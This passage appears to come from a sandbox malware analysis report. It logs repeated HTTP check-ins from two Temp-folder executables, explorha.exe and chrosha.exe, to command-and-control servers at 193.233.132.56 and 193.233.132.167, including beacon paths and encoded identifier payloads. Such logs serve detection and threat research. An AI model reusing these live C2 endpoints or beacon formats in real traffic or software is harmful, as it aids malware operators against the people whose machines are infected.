                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      702192.168.2.550548193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:12.265556097 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:12.513118982 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      703192.168.2.550549193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:12.510811090 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:12.757867098 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      704192.168.2.550550193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:12.758456945 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:13.004904985 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      705192.168.2.550551193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:13.000708103 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:13.245023012 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      706192.168.2.550552193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:13.360433102 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:13.601059914 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      707192.168.2.550553193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:13.600435972 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:13.845953941 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      708192.168.2.550554193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:13.854491949 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:14.107292891 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      709192.168.2.550556193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:14.097085953 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:14.357805014 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      710192.168.2.550557193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:14.467315912 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:14.714122057 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      711192.168.2.550558193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:14.710908890 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:14.957750082 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      712192.168.2.550559193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:14.961406946 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:15.208961010 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      713192.168.2.550560193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:15.210519075 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:15.464256048 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      714192.168.2.550561193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:15.571472883 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:15.818169117 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      715192.168.2.550562193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:15.819173098 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:16.063188076 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      716192.168.2.550563193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:16.073565960 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:16.327847004 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      717192.168.2.550564193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:16.314544916 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:16.561790943 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      718192.168.2.550565193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:16.677108049 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:16.921678066 CEST219INHTTP/1.1 200 OK
